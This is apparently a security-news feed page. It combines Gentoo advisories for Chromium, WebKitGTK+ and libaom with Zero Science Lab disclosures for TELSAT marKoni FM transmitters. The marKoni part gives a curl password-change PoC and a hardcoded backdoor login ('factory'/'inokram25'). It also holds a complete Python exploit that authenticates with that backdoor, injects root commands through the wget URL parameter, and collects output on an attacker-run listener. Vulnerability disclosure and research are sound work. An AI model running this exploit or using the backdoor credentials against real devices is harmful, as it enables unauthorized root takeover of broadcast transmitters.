Gentoo Linux Security Advisory 202401-34 - Multiple vulnerabilities have been discovered in Chromium and its derivatives, the worst of which can lead to remote code execution. Versions greater than or equal to 120.0.6099.109 are affected.

    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Gentoo Linux Security Advisory                           GLSA 202401-34- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -                                           https://security.gentoo.org/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High    Title: Chromium, Google Chrome, Microsoft Edge: Multiple Vulnerabilities     Date: January 31, 2024     Bugs: #907999, #908471, #909283, #910522, #911675, #912364, #913016, #913710, #914350, #914871, #915137, #915560, #915961, #916252, #916620, #917021, #917357, #918882, #919321, #919802, #920442, #921337       ID: 202401-34- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Synopsis========Multiple vulnerabilities have been discovered in Chromium and itsderivatives, the worst of which can lead to remote code execution.Background==========Chromium is an open-source browser project that aims to build a safer,faster, and more stable way for all users to experience the web.Google Chrome is one fast, simple, and secure browser for all yourdevices.Microsoft Edge is a browser that combines a minimal design withsophisticated technology to make the web faster, safer, and easier.Affected packages=================Package                    Vulnerable        Unaffected-------------------------  ----------------  -----------------www-client/chromium        < 120.0.6099.109  >= 120.0.6099.109www-client/google-chrome   < 120.0.6099.109  >= 120.0.6099.109www-client/microsoft-edge  < 120.0.2210.133  >= 120.0.2210.133Description===========Multiple vulnerabilities have been discovered in Chromium and itsderivatives. Please review the CVE identifiers referenced below fordetails.Impact======Please review the referenced CVE identifiers for details.Workaround==========There is no known workaround at this time.Resolution==========All Google Chrome users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=www-client/google-chrome-120.0.6099.109"All Chromium users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=www-client/chromium-120.0.6099.109"All Microsoft Edge users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=www-client/microsoft-edge-120.0.2210.133"References==========[ 1 ] CVE-2023-2312      https://nvd.nist.gov/vuln/detail/CVE-2023-2312[ 2 ] CVE-2023-2929      https://nvd.nist.gov/vuln/detail/CVE-2023-2929[ 3 ] CVE-2023-2930      https://nvd.nist.gov/vuln/detail/CVE-2023-2930[ 4 ] CVE-2023-2931      https://nvd.nist.gov/vuln/detail/CVE-2023-2931[ 5 ] CVE-2023-2932      https://nvd.nist.gov/vuln/detail/CVE-2023-2932[ 6 ] CVE-2023-2933      https://nvd.nist.gov/vuln/detail/CVE-2023-2933[ 7 ] CVE-2023-2934      https://nvd.nist.gov/vuln/detail/CVE-2023-2934[ 8 ] CVE-2023-2935      https://nvd.nist.gov/vuln/detail/CVE-2023-2935[ 9 ] CVE-2023-2936      https://nvd.nist.gov/vuln/detail/CVE-2023-2936[ 10 ] CVE-2023-2937      https://nvd.nist.gov/vuln/detail/CVE-2023-2937[ 11 ] CVE-2023-2938      https://nvd.nist.gov/vuln/detail/CVE-2023-2938[ 12 ] CVE-2023-2939      https://nvd.nist.gov/vuln/detail/CVE-2023-2939[ 13 ] CVE-2023-2940      https://nvd.nist.gov/vuln/detail/CVE-2023-2940[ 14 ] CVE-2023-2941      https://nvd.nist.gov/vuln/detail/CVE-2023-2941[ 15 ] CVE-2023-3079      https://nvd.nist.gov/vuln/detail/CVE-2023-3079[ 16 ] CVE-2023-3214      https://nvd.nist.gov/vuln/detail/CVE-2023-3214[ 17 ] CVE-2023-3215      https://nvd.nist.gov/vuln/detail/CVE-2023-3215[ 18 ] CVE-2023-3216      https://nvd.nist.gov/vuln/detail/CVE-2023-3216[ 19 ] CVE-2023-3217      https://nvd.nist.gov/vuln/detail/CVE-2023-3217[ 20 ] CVE-2023-3420      https://nvd.nist.gov/vuln/detail/CVE-2023-3420[ 21 ] CVE-2023-3421      https://nvd.nist.gov/vuln/detail/CVE-2023-3421[ 22 ] CVE-2023-3422      https://nvd.nist.gov/vuln/detail/CVE-2023-3422[ 23 ] CVE-2023-3727      https://nvd.nist.gov/vuln/detail/CVE-2023-3727[ 24 ] CVE-2023-3728      https://nvd.nist.gov/vuln/detail/CVE-2023-3728[ 25 ] CVE-2023-3730      https://nvd.nist.gov/vuln/detail/CVE-2023-3730[ 26 ] CVE-2023-3732      https://nvd.nist.gov/vuln/detail/CVE-2023-3732[ 27 ] CVE-2023-3733      https://nvd.nist.gov/vuln/detail/CVE-2023-3733[ 28 ] CVE-2023-3734      https://nvd.nist.gov/vuln/detail/CVE-2023-3734[ 29 ] CVE-2023-3735      https://nvd.nist.gov/vuln/detail/CVE-2023-3735[ 30 ] CVE-2023-3736      https://nvd.nist.gov/vuln/detail/CVE-2023-3736[ 31 ] CVE-2023-3737      https://nvd.nist.gov/vuln/detail/CVE-2023-3737[ 32 ] CVE-2023-3738      https://nvd.nist.gov/vuln/detail/CVE-2023-3738[ 33 ] CVE-2023-3740      https://nvd.nist.gov/vuln/detail/CVE-2023-3740[ 34 ] CVE-2023-4068      https://nvd.nist.gov/vuln/detail/CVE-2023-4068[ 35 ] CVE-2023-4069      https://nvd.nist.gov/vuln/detail/CVE-2023-4069[ 36 ] CVE-2023-4070      https://nvd.nist.gov/vuln/detail/CVE-2023-4070[ 37 ] CVE-2023-4071      https://nvd.nist.gov/vuln/detail/CVE-2023-4071[ 38 ] CVE-2023-4072      https://nvd.nist.gov/vuln/detail/CVE-2023-4072[ 39 ] CVE-2023-4073      https://nvd.nist.gov/vuln/detail/CVE-2023-4073[ 40 ] CVE-2023-4074      https://nvd.nist.gov/vuln/detail/CVE-2023-4074[ 41 ] CVE-2023-4075      https://nvd.nist.gov/vuln/detail/CVE-2023-4075[ 42 ] CVE-2023-4076      https://nvd.nist.gov/vuln/detail/CVE-2023-4076[ 43 ] CVE-2023-4077      https://nvd.nist.gov/vuln/detail/CVE-2023-4077[ 44 ] CVE-2023-4078      https://nvd.nist.gov/vuln/detail/CVE-2023-4078[ 45 ] CVE-2023-4349      https://nvd.nist.gov/vuln/detail/CVE-2023-4349[ 46 ] CVE-2023-4350      https://nvd.nist.gov/vuln/detail/CVE-2023-4350[ 47 ] CVE-2023-4351      https://nvd.nist.gov/vuln/detail/CVE-2023-4351[ 48 ] CVE-2023-4352      https://nvd.nist.gov/vuln/detail/CVE-2023-4352[ 49 ] CVE-2023-4353      https://nvd.nist.gov/vuln/detail/CVE-2023-4353[ 50 ] CVE-2023-4354      https://nvd.nist.gov/vuln/detail/CVE-2023-4354[ 51 ] CVE-2023-4355      https://nvd.nist.gov/vuln/detail/CVE-2023-4355[ 52 ] CVE-2023-4356      https://nvd.nist.gov/vuln/detail/CVE-2023-4356[ 53 ] CVE-2023-4357      https://nvd.nist.gov/vuln/detail/CVE-2023-4357[ 54 ] CVE-2023-4358      https://nvd.nist.gov/vuln/detail/CVE-2023-4358[ 55 ] CVE-2023-4359      https://nvd.nist.gov/vuln/detail/CVE-2023-4359[ 56 ] CVE-2023-4360      https://nvd.nist.gov/vuln/detail/CVE-2023-4360[ 57 ] CVE-2023-4361      https://nvd.nist.gov/vuln/detail/CVE-2023-4361[ 58 ] CVE-2023-4362      https://nvd.nist.gov/vuln/detail/CVE-2023-4362[ 59 ] CVE-2023-4363      https://nvd.nist.gov/vuln/detail/CVE-2023-4363[ 60 ] CVE-2023-4364      https://nvd.nist.gov/vuln/detail/CVE-2023-4364[ 61 ] CVE-2023-4365      https://nvd.nist.gov/vuln/detail/CVE-2023-4365[ 62 ] CVE-2023-4366      https://nvd.nist.gov/vuln/detail/CVE-2023-4366[ 63 ] CVE-2023-4367      https://nvd.nist.gov/vuln/detail/CVE-2023-4367[ 64 ] CVE-2023-4368      https://nvd.nist.gov/vuln/detail/CVE-2023-4368[ 65 ] CVE-2023-4427      https://nvd.nist.gov/vuln/detail/CVE-2023-4427[ 66 ] CVE-2023-4428      https://nvd.nist.gov/vuln/detail/CVE-2023-4428[ 67 ] CVE-2023-4429      https://nvd.nist.gov/vuln/detail/CVE-2023-4429[ 68 ] CVE-2023-4430      https://nvd.nist.gov/vuln/detail/CVE-2023-4430[ 69 ] CVE-2023-4431      https://nvd.nist.gov/vuln/detail/CVE-2023-4431[ 70 ] CVE-2023-4572      https://nvd.nist.gov/vuln/detail/CVE-2023-4572[ 71 ] CVE-2023-4761      https://nvd.nist.gov/vuln/detail/CVE-2023-4761[ 72 ] CVE-2023-4762      https://nvd.nist.gov/vuln/detail/CVE-2023-4762[ 73 ] CVE-2023-4763      https://nvd.nist.gov/vuln/detail/CVE-2023-4763[ 74 ] CVE-2023-4764      https://nvd.nist.gov/vuln/detail/CVE-2023-4764[ 75 ] CVE-2023-4900      https://nvd.nist.gov/vuln/detail/CVE-2023-4900[ 76 ] CVE-2023-4901      https://nvd.nist.gov/vuln/detail/CVE-2023-4901[ 77 ] CVE-2023-4902      https://nvd.nist.gov/vuln/detail/CVE-2023-4902[ 78 ] CVE-2023-4903      https://nvd.nist.gov/vuln/detail/CVE-2023-4903[ 79 ] CVE-2023-4904      https://nvd.nist.gov/vuln/detail/CVE-2023-4904[ 80 ] CVE-2023-4905      https://nvd.nist.gov/vuln/detail/CVE-2023-4905[ 81 ] CVE-2023-4906      https://nvd.nist.gov/vuln/detail/CVE-2023-4906[ 82 ] CVE-2023-4907      https://nvd.nist.gov/vuln/detail/CVE-2023-4907[ 83 ] CVE-2023-4908      https://nvd.nist.gov/vuln/detail/CVE-2023-4908[ 84 ] CVE-2023-4909      https://nvd.nist.gov/vuln/detail/CVE-2023-4909[ 85 ] CVE-2023-5186      https://nvd.nist.gov/vuln/detail/CVE-2023-5186[ 86 ] CVE-2023-5187      https://nvd.nist.gov/vuln/detail/CVE-2023-5187[ 87 ] CVE-2023-5217      https://nvd.nist.gov/vuln/detail/CVE-2023-5217[ 88 ] CVE-2023-5218      https://nvd.nist.gov/vuln/detail/CVE-2023-5218[ 89 ] CVE-2023-5346      https://nvd.nist.gov/vuln/detail/CVE-2023-5346[ 90 ] CVE-2023-5472      https://nvd.nist.gov/vuln/detail/CVE-2023-5472[ 91 ] CVE-2023-5473      https://nvd.nist.gov/vuln/detail/CVE-2023-5473[ 92 ] CVE-2023-5474      https://nvd.nist.gov/vuln/detail/CVE-2023-5474[ 93 ] CVE-2023-5475      https://nvd.nist.gov/vuln/detail/CVE-2023-5475[ 94 ] CVE-2023-5476      https://nvd.nist.gov/vuln/detail/CVE-2023-5476[ 95 ] CVE-2023-5477      https://nvd.nist.gov/vuln/detail/CVE-2023-5477[ 96 ] CVE-2023-5478      https://nvd.nist.gov/vuln/detail/CVE-2023-5478[ 97 ] CVE-2023-5479      https://nvd.nist.gov/vuln/detail/CVE-2023-5479[ 98 ] CVE-2023-5480      https://nvd.nist.gov/vuln/detail/CVE-2023-5480[ 99 ] CVE-2023-5481      https://nvd.nist.gov/vuln/detail/CVE-2023-5481[ 100 ] CVE-2023-5482      https://nvd.nist.gov/vuln/detail/CVE-2023-5482[ 101 ] CVE-2023-5483      https://nvd.nist.gov/vuln/detail/CVE-2023-5483[ 102 ] CVE-2023-5484      https://nvd.nist.gov/vuln/detail/CVE-2023-5484[ 103 ] CVE-2023-5485      https://nvd.nist.gov/vuln/detail/CVE-2023-5485[ 104 ] CVE-2023-5486      https://nvd.nist.gov/vuln/detail/CVE-2023-5486[ 105 ] CVE-2023-5487      https://nvd.nist.gov/vuln/detail/CVE-2023-5487[ 106 ] CVE-2023-5849      https://nvd.nist.gov/vuln/detail/CVE-2023-5849[ 107 ] CVE-2023-5850      https://nvd.nist.gov/vuln/detail/CVE-2023-5850[ 108 ] CVE-2023-5851      https://nvd.nist.gov/vuln/detail/CVE-2023-5851[ 109 ] CVE-2023-5852      https://nvd.nist.gov/vuln/detail/CVE-2023-5852[ 110 ] CVE-2023-5853      https://nvd.nist.gov/vuln/detail/CVE-2023-5853[ 111 ] CVE-2023-5854      https://nvd.nist.gov/vuln/detail/CVE-2023-5854[ 112 ] CVE-2023-5855      https://nvd.nist.gov/vuln/detail/CVE-2023-5855[ 113 ] CVE-2023-5856      https://nvd.nist.gov/vuln/detail/CVE-2023-5856[ 114 ] CVE-2023-5857      https://nvd.nist.gov/vuln/detail/CVE-2023-5857[ 115 ] CVE-2023-5858      https://nvd.nist.gov/vuln/detail/CVE-2023-5858[ 116 ] CVE-2023-5859      https://nvd.nist.gov/vuln/detail/CVE-2023-5859[ 117 ] CVE-2023-5996      https://nvd.nist.gov/vuln/detail/CVE-2023-5996[ 118 ] CVE-2023-5997      https://nvd.nist.gov/vuln/detail/CVE-2023-5997[ 119 ] CVE-2023-6112      https://nvd.nist.gov/vuln/detail/CVE-2023-6112[ 120 ] CVE-2023-6345      https://nvd.nist.gov/vuln/detail/CVE-2023-6345[ 121 ] CVE-2023-6346      https://nvd.nist.gov/vuln/detail/CVE-2023-6346[ 122 ] CVE-2023-6347      https://nvd.nist.gov/vuln/detail/CVE-2023-6347[ 123 ] CVE-2023-6348      https://nvd.nist.gov/vuln/detail/CVE-2023-6348[ 124 ] CVE-2023-6350      https://nvd.nist.gov/vuln/detail/CVE-2023-6350[ 125 ] CVE-2023-6351      https://nvd.nist.gov/vuln/detail/CVE-2023-6351[ 126 ] CVE-2023-6508      https://nvd.nist.gov/vuln/detail/CVE-2023-6508[ 127 ] CVE-2023-6509      https://nvd.nist.gov/vuln/detail/CVE-2023-6509[ 128 ] CVE-2023-6510      https://nvd.nist.gov/vuln/detail/CVE-2023-6510[ 129 ] CVE-2023-6511      https://nvd.nist.gov/vuln/detail/CVE-2023-6511[ 130 ] CVE-2023-6512      https://nvd.nist.gov/vuln/detail/CVE-2023-6512[ 131 ] CVE-2023-6702      https://nvd.nist.gov/vuln/detail/CVE-2023-6702[ 132 ] CVE-2023-6703      https://nvd.nist.gov/vuln/detail/CVE-2023-6703[ 133 ] CVE-2023-6704      https://nvd.nist.gov/vuln/detail/CVE-2023-6704[ 134 ] CVE-2023-6705      https://nvd.nist.gov/vuln/detail/CVE-2023-6705[ 135 ] CVE-2023-6706      https://nvd.nist.gov/vuln/detail/CVE-2023-6706[ 136 ] CVE-2023-6707      https://nvd.nist.gov/vuln/detail/CVE-2023-6707[ 137 ] CVE-2023-7024      https://nvd.nist.gov/vuln/detail/CVE-2023-7024[ 138 ] CVE-2024-0222      https://nvd.nist.gov/vuln/detail/CVE-2024-0222[ 139 ] CVE-2024-0223      https://nvd.nist.gov/vuln/detail/CVE-2024-0223[ 140 ] CVE-2024-0224      https://nvd.nist.gov/vuln/detail/CVE-2024-0224[ 141 ] CVE-2024-0225      https://nvd.nist.gov/vuln/detail/CVE-2024-0225Availability============This GLSA and any updates to it are available for viewing atthe Gentoo Security Website: https://security.gentoo.org/glsa/202401-34Concerns?=========Security is a primary focus of Gentoo Linux and ensuring theconfidentiality and security of our users' machines is of utmostimportance to us. Any security concerns should be addressed tosecurity@gentoo.org or alternatively, you may file a bug athttps://bugs.gentoo.org.License=======Copyright 2024 Gentoo Foundation, Inc; referenced textbelongs to its owner(s).The contents of this document are licensed under theCreative Commons - Attribution / Share Alike license.https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-34

Gentoo Linux Security Advisory 202401-33 - Multiple vulnerabilities have been found in WebKitGTK+, the worst of which may lead to remote code execution. Versions greater than or equal to 2.42.2:4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-33  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: WebKitGTK+: Multiple Vulnerabilities  
     Date: January 31, 2024  
     Bugs: #915222, #918667  
       ID: 202401-33

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in WebKitGTK+, the worst of  
which may lead to remote code execution.

Background  
==========

WebKitGTK+ is a full-featured port of the WebKit rendering engine,  
suitable for projects requiring any kind of web integration, from hybrid  
HTML/CSS applications to full-fledged web browsers.

Affected packages  
=================

Package              Vulnerable    Unaffected  
-------------------  ------------  -------------  
net-libs/webkit-gtk  < 2.42.2:4    >= 2.42.2:4  
                     < 2.42.2:4.1  >= 2.42.2:4.1  
                     < 2.42.2:6    >= 2.42.2:6

Description  
===========

Multiple vulnerabilities have been discovered in WebKitGTK+. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All WebKitGTK+ users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.42.2"

References  
==========

[ 1 ] CVE-2023-32359  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32359  
[ 2 ] CVE-2023-35074  
      https://nvd.nist.gov/vuln/detail/CVE-2023-35074  
[ 3 ] CVE-2023-39434  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39434  
[ 4 ] CVE-2023-39928  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39928  
[ 5 ] CVE-2023-40451  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40451  
[ 6 ] CVE-2023-41074  
      https://nvd.nist.gov/vuln/detail/CVE-2023-41074  
[ 7 ] CVE-2023-41983  
      https://nvd.nist.gov/vuln/detail/CVE-2023-41983  
[ 8 ] CVE-2023-41993  
      https://nvd.nist.gov/vuln/detail/CVE-2023-41993  
[ 9 ] CVE-2023-42852  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42852  
[ 10 ] CVE-2023-42890  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42890  
[ 11 ] WSA-2023-0009  
      https://webkitgtk.org/security/WSA-2023-0009.html

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-33

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-33

TELSAT marKoni FM Transmitter version 1.9.5 allows an unauthorized user to change passwords.

TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control Change Password

Vendor: TELSAT Srl  
Product web page: https://www.markoni.it  
Affected version: Markoni-D (Compact) FM Transmitters  
                  Markoni-DH (Exciter+Amplifiers) FM Transmitters  
                  Markoni-A (Analogue Modulator) FM Transmitters  
                  Firmware: 1.9.5  
                            1.9.3  
                            1.5.9  
                            1.4.6  
                            1.3.9

Summary: Professional FM transmitters.

Desc: Unauthorized user could exploit this vulnerability to change  
his/her password, potentially gaining unauthorized access to sensitive  
information or performing actions beyond her/his designated permissions.

Tested on: GNU/Linux 3.10.53 (armv7l)  
           icorem6solox  
           lighttpd/1.4.33

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Macedonian Information Security Research and Development Laboratory  
Zero Science Lab - https://www.zeroscience.mk - @zeroscience

Advisory ID: ZSL-2024-5811  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5811.php

10.11.2023

--

PoC request of a user changing his own password.  
Only admin can edit users. No permissions or Cookie check.

$ curl -s -H "Cookie: name=user-1702119917" \  
http://10.0.8.3:88/cgi-bin/ekafcgi.fcgi?OpCode=4&username=user&password=user&newpassword=t00tw00t

HTTP/1.1 200 OK  
Content-type: text/html  
Cache-control: no-cache  
Set-Cookie: name=user-1702119917; max-age=315360000  
Transfer-Encoding: chunked  
Date: Sat, 9 Dec 2023 11:05:17 GMT  
Server: lighttpd/1.4.33

oc=4&resp=0

TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control

TELSAT marKoni FM Transmitter version 1.9.5 implements client-side restrictions that can be bypassed by editing the HTML source page that enable administrative operations.

  
TELSAT marKoni FM Transmitter 1.9.5 Client-Side Access Control Bypass

Vendor: TELSAT Srl  
Product web page: https://www.markoni.it  
Affected version: Markoni-D (Compact) FM Transmitters  
                  Markoni-DH (Exciter+Amplifiers) FM Transmitters  
                  Markoni-A (Analogue Modulator) FM Transmitters  
                  Firmware: 1.9.5  
                            1.9.3  
                            1.5.9  
                            1.4.6  
                            1.3.9

Summary: Professional FM transmitters.

Desc: The application implements client-side restrictions that can  
be bypassed by editing the HTML source page that enable administrative  
operations.

Tested on: GNU/Linux 3.10.53 (armv7l)  
           icorem6solox  
           lighttpd/1.4.33

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Macedonian Information Security Research and Development Laboratory  
Zero Science Lab - https://www.zeroscience.mk - @zeroscience

Advisory ID: ZSL-2024-5810  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5810.php

10.11.2023

--

These few JavaScript functions can be called directly in the browser's console  
and can enable a user to execute and apply modifications with admin rights.  
There are plenty more functions throughout the web application's interface.

set_wget()  
change_ip_settings()  
change_web_port()  
set_sendtime()  
add_mailaddress()  
set_mailinglist()  
...  
...

TELSAT marKoni FM Transmitter 1.9.5 Client-Side Access Control Bypass

TELSAT marKoni FM Transmitter version 1.9.5 has a hidden super administrative account factory that has the hardcoded password inokram25 that allows full access to the web management interface configuration.

    TELSAT marKoni FM Transmitter 1.9.5 Backdoor AccountVendor: TELSAT SrlProduct web page: https://www.markoni.itAffected version: Markoni-D (Compact) FM Transmitters                  Markoni-DH (Exciter+Amplifiers) FM Transmitters                  Markoni-A (Analogue Modulator) FM Transmitters                  Firmware: 1.9.5                            1.9.3                            1.5.9                            1.4.6                            1.3.9Summary: Professional FM transmitters.Desc: The transmitter has a hidden super administrative account 'factory'that has the hardcoded password 'inokram25' that allows full access tothe web management interface configuration. The factory account is notvisible in the users page of the application and the password cannot bechanged through any normal operation of the device. The backdoor lies inthe /js_files/LogIn_local.js script file. Attackers could exploit thisvulnerability by logging in using the backdoor credentials for the webpanel gaining also additional functionalities including: unit configuration,parameter modification, EEPROM overwrite, clearing DB, and factory logmodification.Tested on: GNU/Linux 3.10.53 (armv7l)           icorem6solox           lighttpd/1.4.33Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2024-5809Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5809.phpCWE ID: 912CWE URL: https://cwe.mitre.org/data/definitions/912.html10.11.2023--The credentials can be seen in the auto_login() JS function in theunprotected /js_files/LogIn_local.js file:$ curl -s http://10.0.8.3:88/js_files/LogIn_local.js |grep -A2 "auto_login()"function auto_login() {     // @mod1    var username = "factory";    var password = "inokram25";$

TELSAT marKoni FM Transmitter 1.9.5 Backdoor Account

TELSAT marKoni FM Transmitter version 1.9.5 is susceptible to unauthenticated remote code execution with root privileges. An attacker can exploit a command injection vulnerability by manipulating the Email settings' WAN IP info service, which utilizes the wget module. This allows the attacker to gain unauthorized access to the system with administrative privileges by exploiting the url parameter in the HTTP GET request to ekafcgi.fcgi.

    #!/usr/bin/env python### TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection PoC Exploit### Vendor: TELSAT Srl# Product web page: https://www.markoni.it# Affected version: Markoni-D (Compact) FM Transmitters#                   Markoni-DH (Exciter+Amplifiers) FM Transmitters#                   Markoni-A (Analogue Modulator) FM Transmitters#                   Firmware: 1.9.5#                             1.9.3#                             1.5.9#                             1.4.6#                             1.3.9## Summary: Professional FM transmitters.## Desc: The marKoni FM transmitters are susceptible to unauthenticated# remote code execution with root privileges. An attacker can exploit# a command injection vulnerability by manipulating the Email settings'# WAN IP info service, which utilizes the 'wget' module. This allows# the attacker to gain unauthorized access to the system with administrative# privileges by exploiting the 'url' parameter in the HTTP GET request# to ekafcgi.fcgi.## -------------------------------------------------------------------------# [lqwrm@metalgear ~]# python yp.tiolpxe 10.0.8.3:88 backdoor 10.0.8.69 whoami# Authentication successful for backdoor# Injecting command: whoami# Listening on port 9999# ('10.0.8.3', 47302) called back# Received: root# Housekeeping...# Zya and thanks for stopping by!## [lqwrm@metalgear ~]# ## -------------------------------------------------------------------------## Tested on: GNU/Linux 3.10.53 (armv7l)#            icorem6solox#            lighttpd/1.4.33### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# Macedonian Information Security Research and Development Laboratory# Zero Science Lab - https://www.zeroscience.mk - @zeroscience### Advisory ID: ZSL-2024-5808# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5808.php### 10.11.2023#from colorama import init, Foreimport re,os,sys,requestsimport socket,threadingfrom time import sleepinit()def just_listen_to_me(lport, cstop):    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.bind(("0.0.0.0", lport))    s.listen(1)    print("Listening on port " + str(lport))    try:        conn, addr = s.accept()        print(addr, "called back")        cstop.set()    except socket.timeout:        print("Call return timeout\nCheck your ports")        conn.close()    while True:        try:            odg = conn.recv(1771).decode()            uam = re.search(r"User-Agent:\s*(.*)", odg)            if uam:                uav = uam.group(1)                print(f"Received: {uav}")                exit()            else:                print("No output for you")        except:            print("Housekeeping...")            exit()    s.close()def authenticate(ipaddr, option): #### Encrypted Shit ####_"    auth_url = f"http://{ipaddr}" # oOoOoOoOoOoOoOoOoOoOoOo"    ep = "/cgi-bin/ekafcgi.fcgi?OpCode=" ##################"    if option == "user": ##################################"        username = "\x75\x73\x65\x72" #####################"        password = "\x75\x73\x65\x72" #####################"    elif option == "admin": ###############################"        username = "\x61\x64\x6D\x69\x6E" #################"        password = "\x61\x64\x6D\x69\x6E" #################"    elif option == "backdoor": ############################"        username = "\x66\x61\x63\x74\x6F\x72\x79" #########"        password = "\x69\x6E\x6F\x6B\x72\x61\x6D\x32\x35"#_"    authp = {        'username': username,        'password': password    }    resp = requests.get(auth_url + ep + "1", params=authp)    if "Set-Cookie" in resp.headers:        print(f"Authentication successful for {option}")        auth_cookie = resp.headers["Set-Cookie"].split(";")[0]        return auth_cookie    else:        print(f"Authentication failed for {option}.")        print("Try a different option.")        return Nonedef execute(ipaddr, cookie, command, listen_ip):    print(f"Injecting command: {command}")    ep = "/cgi-bin/ekafcgi.fcgi?OpCode="    eden = f"http://{ipaddr}{ep}26&param=wget&ena=1&url=-U%20%60{command}%60%20{listen_ip}:9999"    dva = f"http://{ipaddr}{ep}27"    tri = f"http://{ipaddr}{ep}26&param=wget&ena=0&url="    clear = f"http://{ipaddr}{ep}3&com1=203C%20001001"    headers = {"Cookie": cookie}    requests.get(eden, headers=headers)    sleep(2)    requests.get(dva, headers=headers)    sleep(2)    requests.get(tri, headers=headers)    sleep(1)    requests.get(clear, headers=headers)    print("Zya and thanks for stopping by!")    exit(0)def njaaah(text):    columns = os.get_terminal_size().columns    print(text.center(columns))zsl = "\033[91mWaddup!\033[0m" #Win64mrjox = f"""     ________   /          \\  /    ____    \\ |   /    0 \\   | |   \\______/   |   \\____________/  {zsl}       | |      /   \\     /  O  \\    |    O  \\    |       \\    |        \\    |_________|        """if len(sys.argv) != 5:    print()    print("This is a PoC script for the marKoni transmitters 0day")    print("Usage: python yp.tiolpxe <target_ip:port> <option> <listen_ip> <command>")    print("Option: 'user', 'admin', 'backdoor'")    print("Default listening port: 9999")    njaaah(mrjox)    exit()ipaddr = sys.argv[1]opt = sys.argv[2]listen_ip = sys.argv[3]command = sys.argv[4]opt_map = {    "admin"    : "admin",    "user"     : "user",    "backdoor" : "backdoor"}if opt in opt_map:    auth_cookie = authenticate(ipaddr, opt_map[opt])    if auth_cookie:        cstop = threading.Event()        lt = threading.Thread(target=just_listen_to_me, args=(9999, cstop))        lt.start()        execute(ipaddr, auth_cookie, command, listen_ip)        cstop.set()        lt.join()else:    print("Invalid option.")

TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection

Gentoo Linux Security Advisory 202401-32 - Multiple vulnerabilities have been discovered in libaom, the worst of which can lead to remote code execution. Versions greater than or equal to 3.2.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-32  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: libaom: Multiple Vulnerabilities  
     Date: January 31, 2024  
     Bugs: #793932, #798126, #828112  
       ID: 202401-32

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in libaom, the worst of  
which can lead to remote code execution.

Background  
==========

libaom is the Alliance for Open Media's AV1 Codec SDK.

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
media-libs/libaom  < 3.2.0       >= 3.2.0

Description  
===========

Multiple vulnerabilities have been discovered in libaom. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All libaom users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/libaom-3.2.0"

References  
==========

[ 1 ] CVE-2020-36129  
      https://nvd.nist.gov/vuln/detail/CVE-2020-36129  
[ 2 ] CVE-2020-36130  
      https://nvd.nist.gov/vuln/detail/CVE-2020-36130  
[ 3 ] CVE-2020-36131  
      https://nvd.nist.gov/vuln/detail/CVE-2020-36131  
[ 4 ] CVE-2020-36133  
      https://nvd.nist.gov/vuln/detail/CVE-2020-36133  
